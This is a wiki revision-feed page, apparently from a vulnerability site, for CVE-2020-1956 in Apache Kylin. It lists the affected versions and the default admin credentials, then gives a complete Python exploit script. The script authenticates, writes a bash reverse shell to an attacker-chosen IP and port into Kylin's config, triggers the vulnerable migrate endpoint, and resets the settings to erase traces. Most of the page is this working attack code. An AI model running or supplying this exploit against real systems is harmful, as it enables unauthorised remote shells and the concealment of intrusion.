https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-1956_Apache_Kylin_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%2Fru CVE-2020-1956 Apache Kylin 命令注入漏洞/ru - Revision history 2026-04-19T13:24:33Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-1956_Apache_Kylin_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ru&diff=5142&oldid=prev Pwnwiki: Created page with "== Ссылка ==" 2021-06-16T01:59:54Z <p>Created page with &quot;== Ссылка ==&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> <br /> ==Затронутая версия==<br /> &lt;pre&gt;<br /> Apache Kylin 2.3.0 ~ 2.3.2<br /> <br /> Apache Kylin 2.4.0 ~ 2.4.1<br /> <br /> Apache Kylin 2.5.0 ~ 2.5.2<br /> <br /> Apache Kylin 2.6.0 ~ 2.6.5<br /> <br /> Apache Kylin 3.0.0-alpha, Apache Kylin 3.0.0-alpha2, Apache Kylin 3.0.0-beta, Apache Kylin 3.0.0, Kylin 3.0.1<br /> &lt;/pre&gt;<br /> <br /> После открытия войдите в систему с учетной записью и паролем по умолчанию, и начальный интерфейс будет успешным.<br /> &lt;pre&gt;<br /> admin/KYLIN<br /> &lt;/pre&gt;<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> #!/usr/bin/python3<br /> #-*- coding:utf-8 -*-<br /> # author : PeiQi<br /> # from : http://wiki.peiqi.tech<br /> <br /> import requests<br /> import base64<br /> import sys<br /> <br /> <br /> def title():<br /> print('+------------------------------------------')<br /> print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br /> print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br /> print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br /> print('+ \033[34mVersion: Apache Kylin &lt;= 3.0.1 \033[0m')<br /> print('+ \033[36m使用格式: python3 CVE-2020-1956 \033[0m')<br /> print('+ \033[36mUrl &gt;&gt;&gt; http://xxx.xxx.xxx.xxx:7070 \033[0m')<br /> print('+ \033[36mLogin &gt;&gt;&gt; admin:KYLIN(格式为User:Pass) \033[0m')<br /> print('+------------------------------------------')<br /> <br /> def POC_1(target_url):<br /> login_url = target_url + &quot;/kylin/api/user/authentication&quot;<br /> user_pass = str(input(&quot;\033[35mPlease input User and Pass\nLogin &gt;&gt;&gt; \033[0m&quot;))<br /> <br /> Authorization = &quot;Basic &quot; + str((base64.b64encode(user_pass.encode('utf-8'))),'utf-8')<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Authorization&quot;: Authorization,<br /> &quot;Cookie&quot;: &quot;project=null&quot;<br /> }<br /> try:<br /> response = requests.post(url=login_url, headers=headers, timeout=20)<br /> if &quot;password&quot; not in response.text:<br /> print(&quot;\033[31m[x] 账号密码出现错误 \033[0m&quot;)<br /> sys.exit(0)<br /> else:<br /> print(&quot;\033[32m[o] 成功登录,获得JSESSIONID:&quot; + response.cookies[&quot;JSESSIONID&quot;] + &quot;\033[0m&quot;)<br /> return response.cookies[&quot;JSESSIONID&quot;],Authorization<br /> except:<br /> print(&quot;\033[31m[x] 漏洞利用失败\033[0m&quot;)<br /> sys.exit(0)<br /> <br /> def POC_2(target_url, cookie, IP, PORT, Authorization):<br /> config_url = target_url + &quot;/kylin/api/admin/config&quot;<br /> <br /> key = [&quot;kylin.tool.auto-migrate-cube.enabled&quot;,&quot;kylin.tool.auto-migrate-cube.src-config&quot;,&quot;kylin.tool.auto-migrate-cube.dest-config&quot;]<br /> value = [&quot;true&quot;,&quot;echo;bash -i &gt;&amp; /dev/tcp/{}/{} 0&gt;&amp;1;echo&quot;.format(IP, PORT), &quot;shell&quot;]<br /> <br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Authorization&quot;: Authorization,<br /> &quot;Accept&quot;: &quot;application/json, text/plain, */*&quot;,<br /> &quot;Content-Type&quot;: &quot;application/json;charset=UTF-8&quot;,<br /> &quot;Pragma&quot;: &quot;no-cache&quot;,<br /> &quot;Cookie&quot;: &quot;project=null;JSESSIONID=&quot;+cookie<br /> }<br /> for i in range(0,3):<br /> data = &quot;&quot;&quot;{&quot;key&quot;:&quot;%s&quot;,&quot;value&quot;:&quot;%s&quot;}&quot;&quot;&quot; % (key[i], value[i])<br /> try:<br /> response = requests.put(url=config_url, headers=headers, data=data, timeout=20)<br /> if response.status_code == 200:<br /> print(&quot;\033[32m[o] 成功将&quot; + key[i] +&quot;设置为&quot; + value[i] +&quot;\033[0m&quot;)<br /> else:<br /> print(&quot;\033[31m[x] 设置&quot; + key[i] +&quot;为&quot; + value[i] +&quot;失败\033[0m&quot;)<br /> sys.exit(0)<br /> except:<br /> print(&quot;\033[31m[x] 漏洞利用失败 \033[0m&quot;)<br /> sys.exit(0)<br /> <br /> def POC_3(target_url, cookie):<br /> print(&quot;\033[35m[o] 正在反弹shell......\033[0m&quot;)<br /> vuln_url = target_url + &quot;/kylin/api/cubes/kylin_sales_cube/learn_kylin/migrate&quot;<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Cookie&quot;: &quot;project=null;JSESSIONID=&quot; + cookie<br /> }<br /> try:<br /> response = requests.post(url=vuln_url, headers=headers)<br /> POC_4(target_url, cookie)<br /> except:<br /> print(&quot;\033[31m[x] 漏洞利用失败 \033[0m&quot;)<br /> sys.exit(0)<br /> <br /> def POC_4(target_url, cookie):<br /> config_url = target_url + &quot;/kylin/api/admin/config&quot;<br /> <br /> key = [&quot;kylin.tool.auto-migrate-cube.enabled&quot;, &quot;kylin.tool.auto-migrate-cube.src-config&quot;,<br /> &quot;kylin.tool.auto-migrate-cube.dest-config&quot;]<br /> value = [&quot;flase&quot;, &quot;echo;echo;echo&quot;, &quot;None&quot;]<br /> <br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> &quot;Authorization&quot;: Authorization,<br /> &quot;Accept&quot;: &quot;application/json, text/plain, */*&quot;,<br /> &quot;Content-Type&quot;: &quot;application/json;charset=UTF-8&quot;,<br /> &quot;Pragma&quot;: &quot;no-cache&quot;,<br /> &quot;Cookie&quot;: &quot;project=null;JSESSIONID=&quot; + cookie<br /> }<br /> <br /> for i in range(0,3):<br /> data = &quot;&quot;&quot;{&quot;key&quot;:&quot;%s&quot;,&quot;value&quot;:&quot;%s&quot;}&quot;&quot;&quot; % (key[i], value[i])<br /> try:<br /> response = requests.put(url=config_url, headers=headers, data=data, timeout=20)<br /> if response.status_code == 200:<br /> print(&quot;\033[32m[o] 成功将&quot; + key[i] +&quot;设置为&quot; + value[i] +&quot;\033[0m&quot;)<br /> else:<br /> print(&quot;\033[31m[x] 设置&quot; + key[i] +&quot;为&quot; + value[i] +&quot;失败\033[0m&quot;)<br /> sys.exit(0)<br /> except:<br /> print(&quot;\033[31m[x] 漏洞利用失败 \033[0m&quot;)<br /> sys.exit(0)<br /> print(&quot;\033[35m[o] 成功清理痕迹\033[0m&quot;)<br /> <br /> <br /> if __name__ == '__main__':<br /> title()<br /> target_url = str(input(&quot;\033[35mPlease input Attack Url\nUrl &gt;&gt;&gt; \033[0m&quot;))<br /> try:<br /> cookie,Authorization = POC_1(target_url)<br /> except:<br /> print(&quot;\033[31m[x] 漏洞利用失败 \033[0m&quot;)<br /> sys.exit(0)<br /> IP = str(input(&quot;\033[35m请输入监听IP &gt;&gt;&gt; \033[0m&quot;))<br /> PORT = str(input(&quot;\033[35m请输入监听PORT &gt;&gt;&gt; \033[0m&quot;))<br /> POC_2(target_url, cookie, IP, PORT, Authorization)<br /> POC_3(target_url, cookie)<br /> &lt;/pre&gt;<br /> <br /> <br /> == Ссылка ==<br /> https://poc.wgpsec.org/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Kylin/Apache%20Kylin%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2020-1956.html</div> Pwnwiki